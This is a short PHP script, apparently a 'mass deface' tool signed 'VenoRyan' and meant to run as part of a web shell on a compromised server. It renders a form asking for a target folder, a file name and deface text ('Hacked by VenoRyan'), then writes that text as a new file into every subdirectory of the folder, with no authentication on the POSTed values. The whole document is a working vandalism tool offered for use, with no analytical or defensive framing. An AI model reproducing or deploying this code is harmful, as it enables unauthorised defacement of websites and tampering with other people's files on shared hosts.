echo "<body bgcolor='gray'><font color=white'><font face='Electrolize'>";
echo "
";
echo "<img src='https://i.ibb.co/zWd7XQm/1c75ec20e24d660ac60aecdaaaf5510d.jpg'>
<hr color='white'><font color='white'>Target Folder</font>

<input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='base_dir' value='".getcwd ()."'>

";
echo "<font color='white'>Name of File</font>
<input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='andela' value='Veno.php'>
";
echo "<font color='white'>Script Deface</font>
<textarea cols='25' rows='8' style='color:lime;background-color:#000000;background-image:url(http://ac-team.ml/bg.jpg);' name='index'>Hacked by VenoRyan</textarea>
";
echo "<input type='submit' value='Mass !!!'>
";

if (isset ($_POST['base_dir']))
{
if (!file_exists ($_POST['base_dir']))
die ($_POST['base_dir']." Not Found !
");

if (!is_dir ($_POST['base_dir']))
die ($_POST['base_dir']." Is Not A Directory !
");

@chdir ($_POST['base_dir']) or die ("Cannot Open Directory");

$files = @scandir ($_POST['base_dir']) or die ("Fuck u -_-
");

foreach ($files as $file):
if ($file != "." && $file != ".." && @filetype ($file) == "dir")
{
$index = getcwd ()."/".$file."/".$_POST['andela'];
if (file_put_contents ($index, $_POST['index']))
echo "<hr color='white'>>> <font color='white'>$index&nbsp&nbsp&nbsp&nbsp</font><font color='lime'>(&#10003;)</font>";
}
endforeach;
}